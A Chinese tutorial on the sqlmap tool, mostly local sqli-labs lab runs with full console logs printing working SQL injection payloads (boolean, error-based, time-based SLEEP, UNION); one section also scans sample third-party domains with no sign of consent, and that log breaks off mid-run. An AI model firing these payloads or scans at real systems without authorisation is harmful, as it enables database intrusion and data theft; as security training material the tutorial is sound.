## 一、sqlmap获取目标
推荐一篇文章:https://www.comparitech.com/net-admin/sqlmap-cheat-sheet/

1.sql注入介绍

所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
具体来说,它是利用现有应用程序,将SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入可能发生在未知HTTP数据包中任意位置。
创建本地服务后,访问子页面/sqli-labs,点击Less-1,加入参数**?id=2**,会返回登录名和密码到网页上,如图

2.SQL输出级别

Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6。使用参数-v来指定某个等级,如使用参数 -v 6来指定输出级别为6。

  • 0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL]
  • 1:同时显示普通信息[INFO]和警告信息[WARNING]
  • 2:同时显示调试信息[DEBUG]
  • 3:同时显示注入使用的攻击荷载
  • 4:同时显示HTTP请求头
  • 5:同时显示HTTP响应头
  • 6:同时显示HTTP响应体

默认输出级别为1,一般输出到v3即可。

3.sqlmap获取目标

sqlmap直连数据库

(1)服务型数据库-MySQL、Oracle等:

1
python3 sqlmap.py -d "mysql://用户名:密码@地址:端口/数据库名字" -f --banner --dbs --users

其中,banner是指纹,包括数据库的一些详细信息。
使用举例:

1
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:16:55 /2020-02-25/

[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:16:55] [INFO] testing MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] confirming MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] the back-end DBMS is MySQL
[18:16:55] [INFO] fetching banner
[18:16:55] [INFO] resumed: [['5.7.26']]...
[18:16:55] [INFO] actively fingerprinting MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' closed

[*] ending @ 18:16:55 /2020-02-25/


```ini
返回了一些数据库的基本信息如数据库版本等。
返回结果较快,可能是因为提前进行了一些探测,生成了缓存。
再如:
```shell
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:20:41 /2020-02-25/

[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:20:42] [INFO] testing MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] confirming MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] the back-end DBMS is MySQL
[18:20:42] [INFO] fetching banner
[18:20:42] [INFO] resumed: [['5.7.26']]...
[18:20:42] [INFO] actively fingerprinting MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:20:42] [INFO] fetching database users
[18:20:42] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'

[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' closed

[*] ending @ 18:20:42 /2020-02-25/


在之前的基础上,返回的内容增加了用户。
再如:

1
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users --dbs

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:25:20 /2020-02-25/

[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:25:20] [INFO] testing MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] confirming MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] the back-end DBMS is MySQL
[18:25:20] [INFO] fetching banner
[18:25:20] [INFO] resumed: [['5.7.26']]...
[18:25:20] [INFO] actively fingerprinting MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:25:20] [INFO] fetching database users
[18:25:20] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'

[18:25:20] [INFO] fetching database names
[18:25:20] [INFO] resumed: [['information_schema'], ['challenges'], ['demo'], ['demo1125'], ['demo1204'], ['dvwa'], ['jingdong'], ['mysql'], ['performance
_schema'], ['pythontest'], ['security'], ['sys']]...
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys

[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' closed

[*] ending @ 18:25:20 /2020-02-25/


在之前的基础上,返回的内容增加了数据库。

(2)文件型数据库-SQLite

sqlmap指定目标URL

sqlmap直接对单一URL探测,参数使用 -u或者 –url
url格式为:

1
http(s)://targeturl\[:port\]/

举例:

1
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=2 --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:37:12 /2020-02-25/

[18:37:12] [INFO] testing connection to the target URL
[18:37:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:37:12] [INFO] testing if the target URL content is stable
[18:37:12] [INFO] target URL content is stable
[18:37:12] [INFO] testing if GET parameter 'id' is dynamic
[18:37:12] [INFO] GET parameter 'id' appears to be dynamic
[18:37:12] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:37:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:37:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[18:37:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:17] [WARNING] reflective value(s) found and filtering out
[18:37:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:37:17] [INFO] testing 'Generic inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:37:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:37:17] [INFO] testing 'MySQL inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:37:17] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:37:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:37:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[18:37:28] [INFO] target URL appears to have 3 columns in query
[18:37:28] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0
x7176627071)-- -
---
[18:37:28] [INFO] the back-end DBMS is MySQL
[18:37:28] [INFO] fetching banner
[18:37:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:37:28] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:37:28 /2020-02-25/

其中有:
Type: boolean-based blind表示布尔类型盲注;
Payload: id=2’ AND 7360=7360 AND ‘lcZO’=’lcZO表示查询条件,即url后的参数。
用在连接后能正常访问到,如图

存在sql注入点和动态网页才能访问到,如?后的参数,如id=2与数据库进行了交互,此时才能访问到,如果是静态网页、未与数据库进行交互是探测不到的。
url不能加引号,否则会提示url无效。

sqlmap读取不同文件类型进行SQL注入

(1)为便于搜索引擎收录,许多网站专门为搜索引擎生成了xml格式的站点地图,参数是 -x
(2)从多行文本格式文件读取多个目标,对多个目标进行探测,参数是 -m
写一个target.txt,内容为:

www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
www.target1.com/vuln1.php?q=foobar

进行测试:

1
python sqlmap.py -m "xxx\target.txt" --banner

打印

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not res
onsible for any misuse or damage caused by this program

[*] starting @ 19:59:27 /2020-02-25/

[19:59:27] [INFO] parsing multiple targets list from 'xxx\targer.txt'
[19:59:27] [INFO] found a total of 3 targets
URL 1:
GET www.target2.com/vuln2.asp?id=1
do you want to test this URL? [Y/n/q]
>

[19:59:29] [INFO] testing URL 'www.target2.com/vuln2.asp?id=1'
[19:59:29] [INFO] using 'xxxx\sqlmap\output\results-02252020_0759pm.csv' as the CSV results file in multiple targets mode
[19:59:29] [INFO] testing connection to the target URL
[19:59:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:30] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:59:33] [CRITICAL] unable to connect to the target URL
[19:59:33] [INFO] testing if the target URL content is stable
[19:59:34] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:35] [CRITICAL] unable to connect to the target URL
[19:59:35] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[19:59:35] [INFO] testing if GET parameter 'id' is dynamic
[19:59:38] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:59:40] [CRITICAL] unable to connect to the target URL
[19:59:40] [WARNING] GET parameter 'id' does not appear to be dynamic
[19:59:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] y
[20:00:20] [CRITICAL] connection timed out to the target URL
[20:00:20] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:00:20] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:21] [CRITICAL] unable to connect to the target URL
[20:00:21] [INFO] testing for SQL injection on GET parameter 'id'
[20:00:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:00:21] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:22] [CRITICAL] unable to connect to the target URL
[20:00:24] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:25] [CRITICAL] unable to connect to the target URL
[20:00:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:28] [CRITICAL] unable to connect to the target URL
[20:00:28] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:30] [CRITICAL] unable to connect to the target URL
[20:00:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:31] [CRITICAL] unable to connect to the target URL
[20:00:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:00:32] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:35] [CRITICAL] unable to connect to the target URL
[20:00:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:00:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:37] [CRITICAL] unable to connect to the target URL
[20:00:37] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:39] [CRITICAL] unable to connect to the target URL
[20:00:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:40] [CRITICAL] unable to connect to the target URL
[20:00:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:42] [CRITICAL] unable to connect to the target URL
[20:00:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:46] [CRITICAL] unable to connect to the target URL
[20:00:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:00:46] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:48] [CRITICAL] unable to connect to the target URL
[20:00:48] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:50] [CRITICAL] unable to connect to the target URL
[20:00:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:52] [CRITICAL] unable to connect to the target URL
[20:00:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:00:53] [CRITICAL] unable to connect to the target URL
[20:00:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:25] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[20:01:25] [CRITICAL] connection timed out to the target URL
[20:01:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:01:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:26] [CRITICAL] unable to connect to the target URL
[20:01:27] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:01:29] [CRITICAL] unable to connect to the target URL
[20:01:29] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:00] [CRITICAL] connection timed out to the target URL
[20:02:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:05] [CRITICAL] unable to connect to the target URL
[20:02:06] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:08] [CRITICAL] unable to connect to the target URL
[20:02:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:02:08] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:10] [CRITICAL] unable to connect to the target URL
[20:02:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:41] [CRITICAL] connection timed out to the target URL
[20:02:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:43] [CRITICAL] unable to connect to the target URL
[20:02:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:44] [CRITICAL] unable to connect to the target URL
[20:02:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:47] [CRITICAL] unable to connect to the target URL
[20:02:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:02:47] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:49] [CRITICAL] unable to connect to the target URL
[20:02:49] [INFO] testing 'Generic inline queries'
[20:02:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:53] [CRITICAL] unable to connect to the target URL
[20:02:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:02:53] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:02:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:56] [CRITICAL] unable to connect to the target URL
[20:02:57] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:02:57] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session
-technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[20:02:58] [CRITICAL] unable to connect to the target URL
[20:02:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:03] [CRITICAL] unable to connect to the target URL
[20:03:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:07] [CRITICAL] unable to connect to the target URL
[20:03:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:03:08] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:40] [CRITICAL] unable to connect to the target URL
[20:03:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:43] [CRITICAL] unable to connect to the target URL
[20:03:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:45] [CRITICAL] unable to connect to the target URL
[20:03:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:03:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:48] [CRITICAL] unable to connect to the target URL
[20:03:48] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:49] [CRITICAL] unable to connect to the target URL
[20:03:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:53] [CRITICAL] unable to connect to the target URL
[20:03:53] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:55] [CRITICAL] unable to connect to the target URL
[20:03:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:03:55] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:56] [CRITICAL] unable to connect to the target URL
[20:03:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:03:58] [CRITICAL] unable to connect to the target URL
[20:03:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:01] [CRITICAL] unable to connect to the target URL
[20:04:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:03] [CRITICAL] unable to connect to the target URL
[20:04:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:05] [CRITICAL] unable to connect to the target URL
[20:04:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:06] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:09] [CRITICAL] unable to connect to the target URL
[20:04:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:12] [CRITICAL] unable to connect to the target URL
[20:04:15] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:17] [CRITICAL] unable to connect to the target URL
[20:04:47] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:48] [CRITICAL] unable to connect to the target URL
[20:04:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:04:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:50] [CRITICAL] unable to connect to the target URL
[20:04:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:51] [CRITICAL] unable to connect to the target URL
[20:04:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:53] [CRITICAL] unable to connect to the target URL
[20:04:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:55] [CRITICAL] unable to connect to the target URL
[20:04:55] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:04:56] [CRITICAL] unable to connect to the target URL
[20:04:56] [INFO] testing 'Oracle AND time-based blind'
[20:04:56] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:00] [CRITICAL] unable to connect to the target URL
[20:05:01] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:02] [CRITICAL] unable to connect to the target URL
[20:05:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:04] [CRITICAL] unable to connect to the target URL
[20:05:04] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:07] [CRITICAL] unable to connect to the target URL
[20:05:07] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:05:08] [CRITICAL] unable to connect to the target URL
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:09:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:09:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:50] [CRITICAL] unable to connect to the target URL
[20:09:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:52] [CRITICAL] unable to connect to the target URL
[20:09:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:54] [CRITICAL] unable to connect to the target URL
[20:09:56] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:57] [CRITICAL] unable to connect to the target URL
[20:09:58] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:09:59] [CRITICAL] unable to connect to the target URL
[20:09:59] [WARNING] GET parameter 'id' does not seem to be injectable
[20:09:59] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.
. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
URL 2:
GET www.target3.com/vuln3/id/1*
do you want to test this URL? [Y/n/q]
> y
[20:10:07] [INFO] testing URL 'www.target3.com/vuln3/id/1*'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[20:10:12] [INFO] testing connection to the target URL
[20:10:15] [CRITICAL] page not found (404)
[20:10:15] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
URL 3:
GET www.target1.com/vuln1.php?q=foobar
do you want to test this URL? [Y/n/q]
> y
[20:10:20] [INFO] testing URL 'www.target1.com/vuln1.php?q=foobar'
[20:10:20] [INFO] testing connection to the target URL
got a 302 redirect to 'http://1223.dragonparking.com/?site=www.target1.com'. Do you want to follow? [Y/n] y
[20:10:35] [WARNING] the web server responded with an HTTP error code (404) which could interfere with the results of the tests
[20:10:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:10:46] [INFO] testing if the target URL content is stable
[20:10:59] [WARNING] GET parameter 'q' does not appear to be dynamic
[20:11:00] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[20:11:05] [INFO] testing for SQL injection on GET parameter 'q'
